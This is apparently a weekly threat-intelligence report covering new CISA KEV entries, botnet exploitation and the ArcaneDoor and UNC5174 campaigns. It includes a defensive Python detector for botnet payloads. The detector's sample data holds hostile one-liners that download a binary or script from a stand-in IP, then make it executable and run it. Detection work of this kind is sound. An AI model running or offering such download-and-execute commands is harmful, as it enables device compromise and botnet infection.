Executive Summary
This week, the CISA Known Exploited Vulnerabilities (KEV) catalog received a major update with 10 new entries spanning a wide range of vendors, including GNU, Jenkins, Juniper, Samsung, Smartbedded, Sudo, Libraesva, Fortra, Cisco, and Adminer. The additions feature a mix of freshly discovered zero-days and older, long-standing vulnerabilities, with four historical flaws resurfacing in critical deployments.
Botnet activity continues to surge: EnemyBot, Sysrv-k, Andoryu, and Androxgh0st are actively exploiting weaknesses in GitLab, cloud gateways, and PHP-based applications, while IoT-focused botnets such as Mirai, Bashlite, Tsunami, and BrickerBot are intensifying attacks on Eir D1000 routers, aiming for persistence and lateral network movement.
On the advanced threat front, UNC5174 conducted in-the-wild attacks exploiting a VMware guest-service discovery flaw to escalate privileges on virtual machines, while the ArcaneDoor cluster (UAT4356/Storm‑1849) launched a sophisticated campaign against Cisco ASA 5500‑X appliances, deploying the RayInitiator bootkit and LINE VIPER loader to achieve stealthy, long-term persistence.
Trending / Critical Vulnerabilities
Current trending vulnerabilities offer insight into the latest emerging and widely discussed threats, helping defenders make informed prioritization decisions.
CVE-2025-4008
A Command Injection Vulnerability in Smartbedded Meteobridge, a weather station gateway solution, could allow remote unauthenticated attackers to execute arbitrary commands with root privileges on affected devices. Rated CVSS 8.7 (High), the flaw impacts versions up to and including 6.1 and has been patched in version 6.2. The issue was discovered by OneKey, which also released a proof of concept demonstrating its exploitability. Given the risk of full device compromise, the vulnerability has recently been added to the CISA KEV catalog.
CVE-2025-10035
A Deserialization of Untrusted Data Vulnerability in the License servlet of Fortra's GoAnywhere MFT, which allows an attacker to achieve unauthenticated remote code execution. Rated with a critical CVSS Score of 10.0, this flaw stems from improper handling of license-response signatures, where a forged response can deserialize attacker-controlled objects, potentially leading to command injection and full system compromise. Fortra has issued patches, fixing the issue in GoAnywhere MFT version 7.8.4 and the Sustain Release 7.6.3. GoAnywhere MFT is a widely adopted managed file transfer solution, deployed on-premises, in the cloud, and in hybrid environments for secure large-scale file exchanges. While the vulnerability can be exploited remotely without user interaction, exploitation requires access to the administrative console, making instances exposed to the internet most at risk, whereas internally restricted deployments face lower exposure. This critical flaw has also been added to the CISA KEV catalog.
CVE-2025-20352
A Denial of Service (DoS) and Remote Code Execution Vulnerability has been discovered in Cisco IOS and IOS XE software, arising from a stack overflow condition within the SNMP subsystem. Successful exploitation could allow a low-privileged attacker to trigger a system reload, causing a DoS, or enable a high-privileged attacker to execute arbitrary code as root, effectively taking full control of the device. The flaw impacts all versions of SNMP and is rated high in severity. While Cisco has released software updates along with mitigation guidance, no direct workarounds are available. Cisco PSIRT has confirmed that the vulnerability has been actively exploited in the wild, with attackers using compromised local Administrator credentials to target vulnerable systems. The issue has also recently been added to the CISA KEV catalog.
CVE-2025-21043
An Out-of-Bounds Write Vulnerability has been identified in Samsung’s libimagecodec.quram.so component, which could allow remote attackers to execute arbitrary code. Rated CVSS 8.8 (High), the flaw impacts Samsung mobile devices running versions prior to SMR September 2025 Release 1 and has been patched in Samsung’s September 2025 Android security updates. The issue stems from an incorrect implementation in the closed-source image parsing library developed by Quramsoft, which can be exploited via maliciously crafted images. Samsung confirmed that the vulnerability was already being exploited in the wild at the time of disclosure, though details of the active campaigns remain undisclosed. The flaw has since been added to the CISA KEV catalog.
CVE-2025-32463
An Inclusion of Functionality from Untrusted Control Sphere Vulnerability has been identified in Sudo, a privileged command-line utility on Unix/Linux systems that allows permitted users to run commands as the superuser while maintaining an audit trail. Rated CVSS 9.3 (Critical) and affecting versions 1.9.14 through 1.9.17, the flaw was discovered by the Stratascale Cyber Research Unit (CRU) and stems from misuse of Sudo’s -R (--chroot) feature. When a writable chroot directory is specified, Sudo performs chroot()/pivot_root() calls and triggers NSS lookups that cause the system to load /etc/nsswitch.conf from the untrusted environment, allowing attackers to inject a malicious shared library and execute arbitrary code as root. The issue has been fixed in Sudo version 1.9.17p1, where the chroot feature has been deprecated, and the vulnerability has been added to the CISA KEV catalog due to its high exploitation risk.
CVE-2025-59689
A Command Injection Vulnerability in the Libraesva Email Security Gateway (ESG) allows attackers to execute arbitrary shell commands via a specially compressed email attachment. The flaw results from improper sanitization of certain archive formats, letting a malicious file bypass input validation and inject commands. It affects versions 4.5 through 5.5.x prior to 5.5.7. Successful exploitation runs commands under a non-privileged account, which attackers can leverage for persistence, lateral movement, or privilege escalation. Libraesva confirmed the vulnerability was abused in a targeted incident, likely by a foreign hostile actor, against a single appliance rather than as part of a broad financial crime campaign. This vulnerability has recently been added to the CISA KEV catalog.
CVE-2021-21311
A Server-Side Request Forgery (SSRF) Vulnerability in Adminer, an open-source database management tool distributed as a single PHP file. The flaw, present in versions 4.0.0 through 4.7.8, stems from improper error page handling in the Elasticsearch and ClickHouse drivers, enabling remote attackers to initiate SSRF attacks and potentially gain access to sensitive information. The issue primarily impacts deployments using the bundled package with all drivers, particularly the adminer.php file. Originally disclosed in February 2021 and fixed in version 4.7.9, the vulnerability has recently been added to the CISA KEV catalog, underscoring its continued risk to unpatched systems and the urgent need for organizations to update affected instances.
CVE-2017-1000353
A Remote Code Execution Vulnerability in Jenkins allowed unauthenticated attackers to exploit the remoting-based Jenkins CLI by transferring a serialized Java SignedObject, which was deserialized using a new ObjectInputStream, effectively bypassing the blocklist-based protection mechanism. This critical flaw affected Jenkins versions 2.56 and earlier, as well as 2.46.1 LTS and earlier, enabling attackers to achieve arbitrary remote code execution. To mitigate the issue, the Jenkins team added SignedObject to the blocklist, deprecated the vulnerable remoting-based CLI protocol (disabling it by default), and backported the safer HTTP CLI protocol from Jenkins 2.54 to LTS 2.46.2. The vulnerability was fixed in Jenkins 2.57 and 2.46.2 LTS, released in 2017. Despite the patch being available for years, this RCE has recently been added to the CISA KEV catalog, highlighting its continued risk.
CVE-2015-7755
An Improper Authentication Vulnerability in Juniper ScreenOS allowed attackers to bypass administrative authentication by using a hardcoded backdoor password via SSH or Telnet sessions, granting full remote access to affected Netscreen firewalls. Disclosed in December 2015, Juniper revealed that unauthorized code had been inserted into ScreenOS, introducing both an authentication bypass and a VPN backdoor that enabled passive traffic decryption. Researchers quickly identified the hardcoded password, and scans showed nearly 26,000 internet-facing devices were exposed at that time. Affected versions included 6.3.0r17 through 6.3.0r20, with Juniper issuing rebuilt firmware packages (marked with a “b” suffix) and new versions to remove the malicious code. Although patched in 2015, this critical flaw, with a publicly available proof-of-concept, has since been added to the CISA KEV catalog.
CVE-2014-6278
An OS Command Injection Vulnerability in GNU Bash (commonly known as Shellshock) allowed remote attackers to execute arbitrary commands through crafted environment variables. The flaw, present in GNU Bash through version 4.3 bash43-026, stemmed from improper parsing of function definitions in environment variable values, enabling exploitation in scenarios such as OpenSSH’s ForceCommand, Apache HTTP Server’s mod_cgi and mod_cgid modules, and DHCP client scripts where environment variables cross privilege boundaries. This issue existed due to incomplete fixes for earlier vulnerabilities (CVE-2014-6271, CVE-2014-7169, and CVE-2014-6277) and was one of the most widely exploited bugs of its time. Now, more than a decade later, it has been added to the CISA KEV catalog, underscoring its long-standing security impact.
Exploit Activity and Mass Scanning Observed on Cytellite Sensors
Telemetry collected from Loginsoft sensors was analyzed and processed to derive insights into what is actively being exploited and actively being scanned. As a source of truth, source IPv4 addresses and payloads can be provided on a need-to-know basis.
Vulnerabilities abused by Botnet
This section identifies vulnerabilities exploited by botnets, including recent CVEs logged in MISP, and presents the top five CVEs whose payloads are suggestive of botnet activity, such as invoking wget with a raw IP address to fetch a second stage.
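One way to apply that heuristic to captured payloads, as an added example that is not the report's or Loginsoft's own tooling: it flags payloads that download from a bare IPv4 address and ranks CVEs by the number of such hits. The sample records, the placeholder CVE IDs, and the inclusion of curl alongside wget are assumptions.

```python
import re
from collections import Counter
from typing import Optional
from urllib.parse import unquote_plus

# Heuristic stated in the report: a payload that pulls a second stage with wget
# (or curl, assumed here as the obvious sibling) straight from a bare IPv4
# address rather than a hostname is a strong indicator of botnet activity.
_OCTET = r"(?:25[0-5]|2[0-4]\d|1?\d?\d)"
_IPV4 = rf"{_OCTET}(?:\.{_OCTET}){{3}}"
_FETCH = re.compile(
    r"\b(?P<tool>wget|curl)\b[^;&|]*?"          # downloader and its flags
    rf"(?:https?://|ftp://)?(?P<ip>{_IPV4})"    # bare IP, scheme optional
    r"(?::\d{1,5})?(?P<path>/[^\s;&|'\"]*)?",   # optional port and path
    re.IGNORECASE,
)


def fetch_by_ip(payload: str) -> Optional[dict]:
    """Return {'tool', 'ip', 'path'} if the payload downloads from a raw IPv4, else None."""
    # Sensor captures of HTTP requests are often still URL-encoded, so decode
    # first; decoding twice also catches double-encoded payloads.
    decoded = unquote_plus(unquote_plus(payload))
    m = _FETCH.search(decoded)
    if not m:
        return None
    return {"tool": m["tool"].lower(), "ip": m["ip"], "path": m["path"] or "/"}


def top_botnet_cves(records, n: int = 5):
    """Count sensor hits per CVE whose payload matches the heuristic; return the top n."""
    counts = Counter(cve for cve, payload in records if fetch_by_ip(payload))
    return counts.most_common(n)


# Constructed sample of (CVE, captured payload) pairs with placeholder CVE IDs
# and documentation-range IPs; not real sensor data.
SAMPLE_RECORDS = [
    ("CVE-1111-0001", "cd /tmp;wget http://198.51.100.7/bins/arm7;chmod 777 arm7;./arm7"),
    ("CVE-1111-0001", "cmd=cd%20%2Ftmp%3Bwget%20http%3A%2F%2F203.0.113.5%3A8080%2Fsh%20-O%20s%3Bsh%20s"),
    ("CVE-1111-0002", "curl -fsSL 192.0.2.10/x.sh | sh"),
    ("CVE-1111-0003", "wget https://example.com/update.sh -O /tmp/u"),  # hostname: not flagged
    ("CVE-1111-0004", "ping -c 1 192.0.2.1"),                           # IP but no download
]

if __name__ == "__main__":
    for cve, hits in top_botnet_cves(SAMPLE_RECORDS):
        print(f"{cve}: {hits} botnet-like payload(s)")
```

Hostname-based downloads are deliberately not flagged, since the report's indicator is the raw IP; extend the regex if your sensors also see DNS-fronted stagers.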
Vulnerabilities Abused by Malware
We proactively monitor the vulnerabilities that are targeted by adversaries. Each vulnerability is manually studied and mapped to MITRE ATT&CK tactics and techniques. The information is sourced from our vulnerability intelligence platform, which collects and curates data from sources such as Twitter, Telegram, OSINT groups, blogs, data leak sites, and more.
CVE-2025-20333 and CVE-2025-20362
The U.K. NCSC and Cisco reported a sophisticated campaign, linked to the ArcaneDoor cluster and the suspected China-linked actor UAT4356 (aka Storm-1849), that exploited zero-day flaws, notably CVE-2025-20362 and CVE-2025-20333 in ASA 5500-X appliances, to bypass authentication and run malicious code. Forensic analysis uncovered a persistent GRUB-style bootkit called RayInitiator, which reflashes devices to survive reboots and firmware upgrades, and a user-mode loader, LINE VIPER, that executes within the ASA lina process to run CLI commands, capture packets, suppress logs, and maintain stealthy C2. In some cases attackers modified ROMMON on ASA 5500-X models lacking Secure Boot/Trust Anchor, enabling long-term persistence; many affected models are end-of-support or near EoS. Cisco also fixed a third critical flaw, CVE-2025-20363, across ASA/FTD/IOS variants (no evidence of exploitation yet), and agencies have urged immediate updates to fixed releases to mitigate the threat.
CVE-2025-41244
NVISO Labs has attributed the active exploitation of the CVE-2025-41244 vulnerability to UNC5174, a suspected Chinese state-sponsored threat actor with a history of using publicly known exploits for initial access. However, researchers caution that, due to the simplicity of the exploit and the common malware practice of naming binaries after system executables (e.g., httpd), it remains unclear whether UNC5174 deliberately exploited the vulnerability or whether other malware has unintentionally leveraged this privilege escalation over time.
PRE-NVD observed for this week
This section covers vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.
External References
- https://www.cisa.gov/news-events/alerts/2025/09/29/cisa-adds-five-known-exploited-vulnerabilities-catalog
- https://www.cisa.gov/news-events/alerts/2025/10/02/cisa-adds-five-known-exploited-vulnerabilities-catalog
- https://blog.nviso.eu/2025/09/29/you-name-it-vmware-elevates-it-cve-2025-41244/
- https://www.ncsc.gov.uk/news/persistent-malicious-targeting-cisco-devices
- https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_continued_attacks